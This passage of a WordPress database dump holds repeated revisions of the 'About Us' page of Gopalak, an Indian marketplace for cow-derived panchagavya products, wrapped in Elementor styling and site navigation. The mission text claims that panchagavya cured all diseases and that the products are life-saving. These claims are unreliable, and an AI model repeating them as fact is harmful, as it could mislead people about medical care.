mentor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-28 10:36:00','2022-10-28 05:06:00','',1804,'https://gopalak.in/?p=1998',0,'revision','',0),(2000,1,'2022-10-28 10:36:54','2022-10-28 05:06:54','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-28 10:36:54','2022-10-28 05:06:54','',1804,'https://gopalak.in/?p=2000',0,'revision','',0),(2001,1,'2022-10-28 10:36:54','2022-10-28 05:06:54','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana 